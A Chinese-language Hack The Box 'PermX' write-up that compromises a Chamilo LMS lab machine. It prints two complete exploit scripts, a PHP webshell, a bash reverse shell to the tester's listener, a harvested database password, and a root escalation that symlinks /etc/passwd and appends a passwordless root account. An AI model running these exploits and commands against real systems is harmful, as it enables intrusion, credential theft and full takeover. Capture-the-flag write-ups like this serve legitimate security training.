HTB:PermX[WriteUP]

目录

连接至HTB服务器并启动靶机

1.How many TCP ports are listening on PermX?

使用nmap对靶机TCP端口进行开放扫描

2.What is the default domain name used by the web server on the box?

使用curl访问靶机80端口

3.On what subdomain of permx.htb is there an online learning platform?

使用ffuf对该域名进行子域名FUZZ

使用浏览器直接访问该子域

4.What is the name of the application running on `lms.permx.htb?

使用Wappalyzer查看该网站技术栈

5.What version of Chamilo is running on PermX?

使用ffuf对子域进行路径FUZZ

使用浏览器访问子域下robots.txt文件

6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?

启动Metasploit

进入CVE.MITRE.ORG网站搜索该CMS相关漏洞

7.What user is the webserver running as on PermX?

8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo?

本地侧使用nc开始监听

9.Submit the flag located in the mtz user's home directory.

USER_FLAG:7239022c6248c28ed2945734c9e07ac9

10.What is the full path to the script that the mtz user can run as any user without a password?

11./opt/acl.sh allow for changing the access control list on file in what directory? (Don't include the trailing / on the directory.)

12.Does setfacl follow symbolic links by default?(YES)

13.Submit the flag located in the root user's home directory.

ROOT_FLAG:86f2867102ba7ec4855205a4f2096539


连接至HTB服务器并启动靶机

靶机IP:10.10.11.23

分配IP:10.10.14.12


1.How many TCP ports are listening on PermX?

使用nmap对靶机TCP端口进行开放扫描

nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.23

由扫描结果可见,靶机开放端口:22、80共2个端口


2.What is the default domain name used by the web server on the box?

使用curl访问靶机80端口

curl -I 10.10.11.23:80

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I 10.10.11.23:80
HTTP/1.1 302 Found
Date: Mon, 04 Nov 2024 00:32:59 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://permx.htb
Content-Type: text/html; charset=iso-8859-1

由输出可见,直接访问靶机IP将被重定位至:permx.htb


3.On what subdomain of permx.htb is there an online learning platform?

将靶机IP与域名进行绑定

echo '10.10.11.23 permx.htb' >> /etc/hosts

使用ffuf对该域名进行子域名FUZZ

ffuf -u http://permx.htb -H 'Host: FUZZ.permx.htb' -w ../dictionary/subdomains-top1mil-5000.txt -fc 302

再次将靶机IP与该子域进行绑定

echo '10.10.11.23 lms.permx.htb' >> /etc/hosts

使用浏览器直接访问该子域

搜索Chamilo,可见该子域:lms.permx.htb托管一个在线学习平台


4.What is the name of the application running on `lms.permx.htb?

使用Wappalyzer查看该网站技术栈

可见该页面所用WebAPP为:Chamilo(CMS)


5.What version of Chamilo is running on PermX?

使用ffuf对子域进行路径FUZZ

ffuf -u http://lms.permx.htb/FUZZ -w ../dictionary/common.txt

使用浏览器访问子域下robots.txt文件

进入documentation目录下

由该页面标题可见,该CMS版本为:1.11


6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?

对该CMS进行漏洞搜索

searchsploit Chamilo

将RCE相关的EXP拷贝到当前目录下

searchsploit -m 49867.py

查看该EXP代码

cat 49867.py 
# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
# Date: 13/05/2021
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms
# Version: 1.11.14
# Tested on: Ubuntu 20.04.2 LTS
# CVE: CVE-2021-31933
# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/from requests import Session
from random import choice
from string import ascii_lowercaseimport requests# This is all configuration stuff,
url = "http://127.0.0.1/chamilo-lms/"  # URL to remote host web root
user_name = "admin"  # User must be an administrator
password = "admin"
command = "id;whoami"# Where you want to upload your webshell. Must be writable by web server user.
# This spot isn't protectec by .htaccess
webshell_path = 'web/'
webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar" # Just a random name for webshell file
content = f"<?php echo `{command}`; ?>"def main():# Run a context manager with a session object to hold login session after loginwith Session() as s:login_url = f"{url}index.php"login_data = {"login": user_name,"password": password}r = s.post(login_url, data=login_data) # login request# Check to see if login as admin user was successful.if "admin" not in r.url:print(f"[-] Login as {user_name} failed. Need to be admin")returnprint(f"[+] Logged in as {user_name}")print(f"[+] Cookie: {s.cookies}")file_upload_url = f"{url}main/upload/upload.php"# The 'curdirpath' is not santitized, so I traverse to  the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as wellphp_webshell_file = {"curdirpath": (None, f"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}"),"user_upload": (webshell_name, content)}## Good command if you want to see what the request looks like without sending# print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))# Two requests required to actually upload the filefor i in range(2):s.post(file_upload_url, files=php_webshell_file)exploit_request_url = f"{url}{webshell_path}{webshell_name}"print("[+] Upload complete!")print(f"[+] Webshell: {exploit_request_url}")# This is a GET request to the new webshell to trigger code executioncommand_output = s.get(exploit_request_url)print("[+] Command output:\n")print(command_output.text)if __name__ == "__main__":main()

由该EXP注释可知,该EXP基于漏洞:CVE-2021-31933。好像并不是我们要找的2023漏洞

启动Metasploit

msfconsole

搜索Chamilo相关模块

search Chamilo

可见该漏洞模块无需认证可直接代码注入导致RCE,切换至该模块

use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960

查看该模块信息

info

从模块描述可见,该模块基于漏洞:CVE-2023-34960

往上一填,发现答案居然不对,才发现是要找存储型XSS漏洞

进入CVE.MITRE.ORG网站搜索该CMS相关漏洞

stored cross-site进行搜索

该漏洞允许无认证文件执行JS脚本与上传Webshell:CVE-2023-4220


7.What user is the webserver running as on PermX?

我这边直接到Github上寻找该漏洞相关EXP

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-# Name       : CVE-2023-4220
# Autor      : Insomnia (Jacob S.)
# IG         : insomnia.py
# X          : @insomniadev_
# Yt         : insomnia-dev
# Github     : https://github.com/insomnia-jacob
# Description: Automation of RCE in Chamilo LMS on affected versions of CVE-2023-4220 through a web shellimport argparse
import requests
import time
from os import system
import io# Colors
red = '\033[31m'
green = '\033[32m'
blue = '\033[34m'
yellow = '\033[93m'
reset = '\033[0m'def arguments():global argsparser = argparse.ArgumentParser()parser.add_argument( '-t', '--target', required=True ,help='Enter the target domain, for example: http://example.com' )args = parser.parse_args()def check_url_exists(url):print(blue,'\n\n[+]', reset, 'Checking if it is vulnerable.')try:response = requests.head(url + '/main/inc/lib/javascript/bigupload/files', allow_redirects=True)if response.status_code == 200:is_vuln()try:response2 = requests.head(url + '/main/inc/lib/javascript/bigupload/files/insomnia.php', allow_redirects=True)if response2.status_code == 200:print(f'Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php')else:upload_file(args.target)except requests.RequestException as e:print(red,f"[x] Error checking the URL: {e}")return Falseelse:print(f'Error {url}')except requests.RequestException as e:print(red,f"[x] Error checking the URL: {e}")return Falsedef upload_file(url):new_url = url + '/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'insomnia_php = """
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?phpif(isset($_GET['cmd'])){system($_GET['cmd'] . ' 2>&1');}
?>
</pre>
</body>
</html>
"""file_like_object = io.BytesIO(insomnia_php.encode('utf-8'))file_like_object.name = 'insomnia.php'  files = {'bigUploadFile': file_like_object}response3 = requests.post(new_url, files=files)print(response3.status_code)print(f'Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php')def is_vuln():print(red,'''
███████████████████████████
███████▀▀▀░░░░░░░▀▀▀███████
████▀░░░░░░░░░░░░░░░░░▀████
███│░░░░░░░░░░░░░░░░░░░│███
██▌│░░░░░░░░░░░░░░░░░░░│▐██
██░└┐░░░░░░░░░░░░░░░░░┌┘░██
██░░└┐░░░░░░░░░░░░░░░┌┘░░██     [*] "It is vulnerable!"
██░░┌┘▄▄▄▄▄░░░░░▄▄▄▄▄└┐░░██
██▌░│██████▌░░░▐██████│░▐██     [*] "It is vulnerable!"
███░│▐███▀▀░░▄░░▀▀███▌│░███
██▀─┘░░░░░░░▐█▌░░░░░░░└─▀██     [*] "It is vulnerable!"
██▄░░░▄▄▄▓░░▀█▀░░▓▄▄▄░░░▄██
████▄─┘██▌░░░░░░░▐██└─▄████     [*] "It is vulnerable!"
█████░░▐█─┬┬┬┬┬┬┬─█▌░░█████
████▌░░░▀┬┼┼┼┼┼┼┼┬▀░░░▐████
█████▄░░░└┴┴┴┴┴┴┴┘░░░▄█████
███████▄░░░░░░░░░░░▄███████
██████████▄▄▄▄▄▄▄██████████
███████████████████████████
''', reset)    def target(url):print(blue ,f'             URL: {url}')time.sleep(3)system("clear")    def banner():textBanner = rf"""/ __)/ )( \(  __)___(___ \ /  \(___ \( __ \ ___  / _ \(___ \(___ \ /  \ 
( (__ \ \/ / ) _)(___)/ __/(  0 )/ __/ (__ ((___)(__  ( / __/ / __/(  0 )\___) \__/ (____)   (____) \__/(____)(____/       (__/(____)(____) \__/ 
"""print(green,textBanner)print(yellow,'                                                                            by Insomnia (Jacob S.)')def main():arguments()banner()target(args.target)check_url_exists(args.target)if __name__ == '__main__':main()

直接使用该EXP开始漏洞利用

python exploit.py -t http://lms.permx.htb/

直接访问EXP提供的URL,执行whoami命令

由回显可见,当前用户为:www-data


8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo?

本地侧使用nc开始监听

nc -lvnp 1425

通过EXP提供的Webshell反弹shell

bash -c 'bash -i >& /dev/tcp/10.10.14.12/1425 0>&1'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.23] 53550
bash: cannot set terminal process group (1173): Inappropriate ioctl for device
bash: no job control in this shell
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ whoami
<ilo/main/inc/lib/javascript/bigupload/files$ whoami                     
www-data

提升TTY

script -c /bin/bash -q /dev/null

搜索WebAPP下所有可能的配置相关文件并输出为列表

find /var/www/chamilo -name 'conf*' -type f 2>/dev/null | tee res.txt

逐个查看文件内容,并匹配'password'字段

cat res.txt | xargs -I {} sh -c 'cat {} | grep "password"'

查询该字段出处:03F6lY3uXAP2bkW8

xargs -I {} sh -c 'grep -m1 "03F6lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt

www-data@permx:/var/www/chamilo$ xargs -I {} sh -c 'grep -m1 "03F6lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt
<lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
Found in /var/www/chamilo/app/config/configuration.php

从该文件中找出匹配字符串并输出上下5行

grep -C 5 '03F6lY3uXAP2bkW8' /var/www/chamilo/app/config/configuration.php

www-data@permx:/var/www/chamilo$ grep -C 5 '03F6lY3uXAP2bkW8' /var/www/chamilo/app/config/configuration.php
<bkW8' /var/www/chamilo/app/config/configuration.php
// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;

/**
 * Directory settings.

账户:chamilo

密码:03F6lY3uXAP2bkW8

总结一下,该文件存储着数据库连接信息:/var/www/chamilo/app/config/configuration.php


9.Submit the flag located in the mtz user's home directory.

查看靶机支持登录的用户

cat /etc/passwd

尝试使用该用户对靶机进行SSH服务登录

ssh mtz@10.10.11.23 

查询user_flag位置并查看其内容

mtz@permx:~$ find / -name 'user.txt' 2>/dev/null
/home/mtz/user.txt
mtz@permx:~$ cat /home/mtz/user.txt
7239022c6248c28ed2945734c9e07ac9

USER_FLAG:7239022c6248c28ed2945734c9e07ac9


10.What is the full path to the script that the mtz user can run as any user without a password?

查看该用户可无密码特权运行的命令

sudo -l

mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh

存在文件可无密码特权运行:/opt/acl.sh


11./opt/acl.sh allow for changing the access control list on file in what directory? (Don't include the trailing / on the directory.)

通过脚本内容可知,该脚本运行后允许在/home/mtz目录下赋任意链接任意权限


12.Does setfacl follow symbolic links by default?(YES)

13.Submit the flag located in the root user's home directory.

尝试创建连接test,连接至/etc/passwd

ln -s /etc/passwd /home/mtz/test

通过/opt/acl.sh脚本为/home/mtz/test链接赋读写权限

sudo /opt/acl.sh mtz rw /home/mtz/test

mtz@permx:~$ ln -s /etc/passwd /home/mtz/test
mtz@permx:~$ ls
priv  test  user.txt
mtz@permx:~$ sudo /opt/acl.sh mtz rw /home/mtz/test

/home/mtz/test链接中写入新用户

echo '0dayhp::0:0:0dayhp:/root:/bin/bash' >> /home/mtz/test

切换到0dayhp用户bash

su 0dayhp

查找root_flag位置并查看其内容

root@permx:/home/mtz# find / -name 'root.txt'
/root/root.txt
/var/www/chamilo/vendor/symfony/intl/Tests/Data/Bundle/Reader/Fixtures/txt/root.txt
root@permx:/home/mtz# cat /root/root.txt
86f2867102ba7ec4855205a4f2096539

ROOT_FLAG:86f2867102ba7ec4855205a4f2096539

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/7111.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

Python 项目国际化:使用 Babel 实现多语言支持

文章目录 如何使用 Babel 实现 Python 项目国际化1. 安装 Babel2. 设置项目目录结构3. 标记可翻译的文本4. 提取可翻译的文本生成文件 —— 生成pot文件4.1 有配置文件方式&#xff08;使用 babel.cfg&#xff09;4.1.1. 创建 babel.cfg 文件4.1.2. 提取翻译内容 4.2 无配置文件…

信号-2-信号捕捉

相关概念&#xff1a;递达 未决 / 阻塞 忽略 阻塞 vs 忽略 阻塞&#xff1a; 如果指定信号信号被阻塞&#xff0c; block期间该信号不能被递达&#xff0c;一直在pending表中。知道block被撤销后&#xff0c; 该信号才能递达&#xff0c;递达后对应pending位置置零。 忽…

正则表达式1 re.match惰性匹配详解案例

点个关注 re.match() re.match() 函数尝试从字符串的开头开始匹配一个模式&#xff0c;如果匹配成功&#xff0c;返回一个匹配成功的对象&#xff0c;否则返回None。大小写区分&#xff0c;内容匹配不到后面的,只能匹配一个&#xff0c;不能有空格&#xff08;开头匹配&#…

如何针对云计算安全进行等保测评?

等级保护作为我国网络安全法明确的重要制度&#xff0c;已在我国信息系统安全保驾护航中发挥着重要作用。目前&#xff0c;等级保护已经进入了2.0时代&#xff0c;“云、大、物、移、工控”纳入等保监管。 当前&#xff0c;按照传统等级保护技术要求实施的安全策略已经不能适应…

软考:性能测试的几个方面

性能测试的指标&#xff1a; 响应时间&#xff0c;吞吐量&#xff0c;并发用户数&#xff0c;资源利用率等 四个方面&#xff1a; 1、发现缺陷 2、性能调优 3、评估系统能力&#xff0c;不仅需要&#xff0c;还需要。 4、验证稳定性和可靠性

Vue(JavaScript)读取csv表格并求某一列之和(大浮点数处理: decimal.js)

文章目录 想要读这个表格&#xff0c;并且求第二列所有价格的和方法一&#xff1a;通过添加文件输入元素上传csv完整&#xff08;正确&#xff09;代码之前的错误部分因为价格是小数&#xff0c;所以下面的代码出错。如果把parseFloat改成parseInt&#xff0c;那么求和没有意义…

搭建兰空图床并配合PicGo实现批量上传

文章目录 服务器安装docker安装数据库部署兰空图床兰空图床配置邮箱验证配合PicGo实现批量上传 最近想试试自己搭建图床&#xff0c;虽然免费的又拍云够用了&#xff0c;但对象存储和图床还是有区别的&#xff0c;用起来有些复杂&#xff0c;所以打算试试兰空图床 服务器 想搭建…

如何对数据库的表字段加密解密处理?

对于表格数据的加密处理&#xff0c;通常涉及到对数据库中存储的数据进行加密&#xff0c;以保护敏感信息。 Java示例&#xff08;使用AES算法加密数据库表数据&#xff09; 首先&#xff0c;你需要一个数据库连接&#xff0c;这里假设你使用的是JDBC连接MySQL数据库。以下是…

LLM训练”中的“分布式训练并行技术;分布式训练并行技术

目录 “LLM训练”中的“分布式训练并行技术” 分布式训练并行技术 数据并行 流水线并行:按阶段(stage)进行切分 张量并行 序列并行 多维混合并行 自动并行 MOE并行 重要的分布式AI框架 “LLM训练”中的“分布式训练并行技术” 随着深度学习技术的不断发展,特别是…

TS学习笔记

一、TS运行环境搭建 1、安装 安装命令 npm i -g typescript 第一步&#xff1a;新建index.html和demo.ts 第二步&#xff1a;在index.html引入demo.ts文件 第三步&#xff1a;运行TS的命令 tsc demo.ts 注意&#xff1a;运行命令后&#xff0c;会将ts文件转换成js文件 …

ubuntu 22.04 server 安装 和 初始化 LTS

ubuntu 22.04 server 安装 和 初始化 下载地址 https://releases.ubuntu.com/jammy/ 使用的镜像是 ubuntu-22.04.5-live-server-amd64.iso usb 启动盘制作工具 https://rufus.ie/zh/ rufus-4.6p.exe 需要主板 支持 UEFI 启动 Ubuntu22.04.4-server安装 流程 https://b…

Python接口自动化测试实战

&#x1f345; 点击文末小卡片 &#xff0c;免费获取软件测试全套资料&#xff0c;资料在手&#xff0c;涨薪更快 接口自动化测试是指通过编写程序来模拟用户的行为&#xff0c;对接口进行自动化测试。Python是一种流行的编程语言&#xff0c;它在接口自动化测试中得到了广泛…

day01 - web开发简介

本课程涉及到的技术&#xff1a; Vue ElementUI/Html Js SpringBoot–Spring SpringMvc MyBatis(Plus) SSM Axios 学习路径&#xff1a; 前端主要&#xff1a; Html5css3JavaScript(JQuery)–>Vue(Node.js也可以学习一 下&#xff0c;服务端js)ElementUi(uni-app) 后端主要…

qt QMessageBox详解

1、概述 QMessageBox是Qt库中的一个类&#xff0c;它用于在图形用户界面&#xff08;GUI&#xff09;程序中显示消息框。消息框是一种用于向用户显示信息、警告、错误或询问用户确认的对话框。QMessageBox可以显示文本、图标和按钮&#xff0c;并允许自定义按钮的文本和功能。…

简易版 python调用cuda方法

目标: 手写一些cuda库, 使用python调用这些库 (Linux) 步骤一: 在linux上安装pybind11 方法1: sudo apt-get install python3-pybind11 方法2: git clone https://github.com/pybind/pybind11.git, 如果将其放在项目目录下的话可以不编译 步骤二: 编写CUDA代码 示例: gpu_l…

51单片机学习心得2(基于STC89C52):串口通信(UART)

串口通信&#xff08;UART&#xff09; 电平标准 &#xff08;注意&#xff1a;单片机中常使用TTL电平&#xff09; 上图中第一种与第二种电平传输信号有效距离只有十几米&#xff0c;距离超出后会传输数据错误&#xff1b;但是第三种电平传输的有效距离可达上千米。 常用通信…

gitlab-runner中搭建nvm、nrm以及优化maven打包

欢迎来到我的博客&#xff0c;代码的世界里&#xff0c;每一行都是一个故事 &#x1f38f;&#xff1a;你只管努力&#xff0c;剩下的交给时间 &#x1f3e0; &#xff1a;小破站 gitlab-runner中搭建nvm、nrm以及优化maven打包 git、gitlab-runner如何以gitlab-runner执行nvm、…

一文读懂:AIOps 从自动化运维到智能化运维

今天跟大家聊一聊AIOps&#xff08;人工智能运维&#xff09; 为了应对企业面临着日益复杂的运营挑战&#xff0c;AIOps&#xff08;人工智能运维&#xff09;作为一种创新的方法应运而生&#xff0c;结合了人工智能和机器学习技术&#xff0c;来提升IT运营的效率和性能。 这…

Java反射

动态代理 java.lang.reflect.Proxy:提供了为对象产生代理的方法&#xff1a; public static Object newProxyInstance(ClassLoader loader,Class<?>[] interfaces,InvocationHandler h) loader&#xff1a;指定用哪个类加载器&#xff0c;去加载生成的代理类。interfa…

废弃物分类分割系统:入门训练营

废弃物分类分割系统源码&#xff06;数据集分享 [yolov8-seg-C2f-DCNV2-Dynamic&#xff06;yolov8-seg-C2f-DWR等50全套改进创新点发刊_一键训练教程_Web前端展示] 1.研究背景与意义 项目参考ILSVRC ImageNet Large Scale Visual Recognition Challenge 项目来源AAAI Glob…